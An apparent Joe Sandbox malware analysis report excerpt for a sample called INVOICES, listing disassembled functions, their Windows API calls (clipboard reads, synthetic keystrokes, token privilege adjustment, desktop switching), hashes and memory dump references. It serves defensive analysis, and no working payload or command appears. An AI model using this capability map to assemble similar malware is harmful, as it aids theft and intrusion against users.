                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __getptd_noexit__lock_file
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2597487223-0
                                                                                                                                  • Opcode ID: 98db41fb79ddcd5553e8d5bef3d840408e2de9931cc5df3594f3ef94f57d9dbf
                                                                                                                                  • Instruction ID: c9ba997bfb08e3e408025f2c5cf2397a874aebafcbdac788642ab548815a1433
                                                                                                                                  • Opcode Fuzzy Hash: 98db41fb79ddcd5553e8d5bef3d840408e2de9931cc5df3594f3ef94f57d9dbf
                                                                                                                                  • Instruction Fuzzy Hash: CEF0AF32940245EBDF91AF748C0E3DE36A1AF0032BF04C514BC24AA191DBFC8A98DF52
                                                                                                                                  Function 00734FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,007F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00734FDE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                  • Opcode ID: a17dbec5625d7ce88cf8da9c715e0ef5c2d6110b07c912322323bbca15b73dbb
                                                                                                                                  • Instruction ID: 34d67188380e59aa9fa7f1049fbcbdc35b37891d01e9f131fff9ec399afde082
                                                                                                                                  • Opcode Fuzzy Hash: a17dbec5625d7ce88cf8da9c715e0ef5c2d6110b07c912322323bbca15b73dbb
                                                                                                                                  • Instruction Fuzzy Hash: 9AF03971105712CFDB389F64E894822BBE2AF0532972C8E3EE5D682612C739A854DF40
                                                                                                                                  Function 00750911 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00750930
                                                                                                                                    • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongNamePath_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2514874351-0
                                                                                                                                  • Opcode ID: 8f178b1f4e60ca5ead118b282b7f8810c2cd17a95a963727a1548468abbdaee0
                                                                                                                                  • Instruction ID: 2a8998de8645f3d0984e77d888156ba7ea02fb22cd6aa135fd331c164e77930a
                                                                                                                                  • Opcode Fuzzy Hash: 8f178b1f4e60ca5ead118b282b7f8810c2cd17a95a963727a1548468abbdaee0
                                                                                                                                  • Instruction Fuzzy Hash: 61E0CD76A0512C97C720D6A89C09FFA77EDDF88790F0441B6FC0DD7305D9655C81C690
                                                                                                                                  Function 007553CB Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wfsopen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 197181222-0
                                                                                                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                  • Instruction ID: 7ed4d4bcd970db34338de9d0f3808dfcff6a1f23398a05c45f28632902a55b50
                                                                                                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                  • Instruction Fuzzy Hash: E0B0927644020CB7CE012A82EC02A893B599B407A8F408060FF0C181A2A6B7B6649689
                                                                                                                                  Function 00750D88 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                  • Instruction ID: b62f751dcf9095284ebac31a1acd3b1cef1ace876cbae8984ef2f3b1138a4af7
                                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                  • Instruction Fuzzy Hash: C531F774A001099BCB18DF58D4819A9FBB2FF49302B7886A5E809CB351DB74EDC5CBC0
                                                                                                                                  Function 0094229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 009422B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                  • Instruction ID: b58d0797761a234c4394fac1c273aecf2485470c36b536af7e35a82110550cef
                                                                                                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                  • Instruction Fuzzy Hash: 91E0BF7494010EEFDB00EFA4D5496DE7BB4FF04311F1005A1FD05D7680DB709E548A62
                                                                                                                                  Function 009422A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 009422B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                  • Instruction ID: 5a8ce00fa3667c7db8969f946e979da98e5d412a82e41477fbd50009909e9e90
                                                                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                  • Instruction Fuzzy Hash: ECE0E67494010EDFDB00EFB4D54969E7FB4FF04301F100161FD01D2280D6709D508A72

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 007BCB26 Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 632windowkeyboardnativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 007BCBA1
                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007BCBFF
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 007BCC40
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007BCC6A
                                                                                                                                  • SendMessageW.USER32 ref: 007BCC93
                                                                                                                                  • _wcsncpy.LIBCMT ref: 007BCCFF
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 007BCD20
                                                                                                                                  • GetKeyState.USER32(00000009), ref: 007BCD2D
                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007BCD43
                                                                                                                                  • GetKeyState.USER32(00000010), ref: 007BCD4D
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007BCD76
                                                                                                                                  • SendMessageW.USER32 ref: 007BCD9D
                                                                                                                                  • SendMessageW.USER32(?,00001030,?,007BB37C), ref: 007BCEA1
                                                                                                                                  • SetCapture.USER32(?), ref: 007BCED3
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 007BCF38
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007BCF5F
                                                                                                                                  • ReleaseCapture.USER32 ref: 007BCF6A
                                                                                                                                  • GetCursorPos.USER32(?), ref: 007BCFA4
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 007BCFB1
                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 007BD00D
                                                                                                                                  • SendMessageW.USER32 ref: 007BD03B
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 007BD078
                                                                                                                                  • SendMessageW.USER32 ref: 007BD0A7
                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007BD0C8
                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007BD0D7
                                                                                                                                  • GetCursorPos.USER32(?), ref: 007BD0F7
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 007BD104
                                                                                                                                  • GetParent.USER32(?), ref: 007BD124
                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 007BD18D
                                                                                                                                  • SendMessageW.USER32 ref: 007BD1BE
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 007BD21C
                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007BD24C
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 007BD276
                                                                                                                                  • SendMessageW.USER32 ref: 007BD299
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 007BD2EB
                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007BD31F
                                                                                                                                    • Part of subcall function 007325DB: GetWindowLongW.USER32(?,000000EB), ref: 007325EC
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 007BD3BB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                                  • String ID: @GUI_DRAGID$F
                                                                                                                                  • API String ID: 302779176-4164748364
                                                                                                                                  • Opcode ID: 6c841bc89b2f390acdec27ac91fcf0ec08de435b1364e723267ca9fa5b55c010
                                                                                                                                  • Instruction ID: d2790813d9263a3e0c49f65319853b65be8830ff2f37736d9125b5cc2b9a41a1
                                                                                                                                  • Opcode Fuzzy Hash: 6c841bc89b2f390acdec27ac91fcf0ec08de435b1364e723267ca9fa5b55c010
                                                                                                                                  • Instruction Fuzzy Hash: EE42CC70204341EFD721CF28C848FAABBE5FF49710F148A69F695972A1D77AD850CB62
                                                                                                                                  Function 007470FE Relevance: 54.0, APIs: 19, Strings: 9, Instructions: 5018COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$_memset
                                                                                                                                  • String ID: ]~$DEFINE$Oat$P\~$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                                                                  • API String ID: 1357608183-2460949281
                                                                                                                                  • Opcode ID: 81722b7def7560632107c7b276b241324b6384d715b713093eca28e1a4cea6a5
                                                                                                                                  • Instruction ID: 39058237f7ab98163402d526b82936511ecbccb9daada05c4790a1aa77f16abb
                                                                                                                                  • Opcode Fuzzy Hash: 81722b7def7560632107c7b276b241324b6384d715b713093eca28e1a4cea6a5
                                                                                                                                  • Instruction Fuzzy Hash: 9893B471E40219DFDB24DF98C881BADB7B1FF48710F25816AE945EB281E7789D82CB50
                                                                                                                                  Function 00734A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetForegroundWindow.USER32(00000000,?), ref: 00734A3D
                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0076D9BE
                                                                                                                                  • IsIconic.USER32(?), ref: 0076D9C7
                                                                                                                                  • ShowWindow.USER32(?,00000009), ref: 0076D9D4
                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0076D9DE
                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0076D9F4
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0076D9FB
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0076DA07
                                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0076DA18
                                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0076DA20
                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 0076DA28
                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0076DA2B
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0076DA40
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0076DA4B
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0076DA55
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0076DA5A
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0076DA63
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0076DA68
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0076DA72
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0076DA77
                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0076DA7A
                                                                                                                                  • AttachThreadInput.USER32(?,?,00000000), ref: 0076DAA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                  • API String ID: 4125248594-2988720461
                                                                                                                                  • Opcode ID: 1692aff3687a760078ace5f23c8400bb365b66c6037cc293206da4917dad4710
                                                                                                                                  • Instruction ID: a9c38b13ca409a6ffb80963d8569c1a82cea869e19b284ec5f748c3013d3e1a2
                                                                                                                                  • Opcode Fuzzy Hash: 1692aff3687a760078ace5f23c8400bb365b66c6037cc293206da4917dad4710
                                                                                                                                  • Instruction Fuzzy Hash: 5F317371A50318BAEB305FA59C49FBF7F6CEB44F50F108125FE05EA1D0CAB45D11AAA4
                                                                                                                                  Function 007A407C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenClipboard.USER32(007BF910), ref: 007A40A6
                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 007A40B4
                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 007A40BC
                                                                                                                                  • CloseClipboard.USER32 ref: 007A40C8
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 007A40E4
                                                                                                                                  • CloseClipboard.USER32 ref: 007A40EE
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 007A4103
                                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 007A4110
                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 007A4118
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 007A4125
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 007A4159
                                                                                                                                  • CloseClipboard.USER32 ref: 007A4269
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3222323430-0
                                                                                                                                  • Opcode ID: 9597c5e34661e58bc1e8f5949bc074e88eafc47de3bfa0ba31d6414914c9b5b4
                                                                                                                                  • Instruction ID: 8e55f7c5bce0399a3518ab8276328565afaea4160a6c17758f530a4eaffb79db
                                                                                                                                  • Opcode Fuzzy Hash: 9597c5e34661e58bc1e8f5949bc074e88eafc47de3bfa0ba31d6414914c9b5b4
                                                                                                                                  • Instruction Fuzzy Hash: 48518075204305AFE310AF64DC89F6FB7A8AFC5B01F008629F646D21E1DFB9D9058B66
                                                                                                                                  Function 00788638 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 224COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00788AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00788AED
                                                                                                                                    • Part of subcall function 00788AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00788B1A
                                                                                                                                    • Part of subcall function 00788AA3: GetLastError.KERNEL32 ref: 00788B27
                                                                                                                                  • _memset.LIBCMT ref: 0078867B
                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007886CD
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 007886DE
                                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007886F5
                                                                                                                                  • GetProcessWindowStation.USER32 ref: 0078870E
                                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00788718
                                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00788732
                                                                                                                                    • Part of subcall function 007884F3: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00788631), ref: 00788508
                                                                                                                                    • Part of subcall function 007884F3: CloseHandle.KERNEL32(?,?,00788631), ref: 0078851A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                  • String ID: $default$winsta0
                                                                                                                                  • API String ID: 2063423040-1027155976
                                                                                                                                  • Opcode ID: 765594ea5f3e91fb783287c33a832abd87f4c76da5571c0cd39f3953bb160665
                                                                                                                                  • Instruction ID: bf1932be0222e423d622ece3026d754b61487571675718f44504ce07e2efa1c5
                                                                                                                                  • Opcode Fuzzy Hash: 765594ea5f3e91fb783287c33a832abd87f4c76da5571c0cd39f3953bb160665
                                                                                                                                  • Instruction Fuzzy Hash: 81819E71850209EFDF51EFA4CC49EEE7BB8EF04304F948169F814A6161DB398E04DB62
                                                                                                                                  Function 0079C7E8 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0079C819
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079C86D
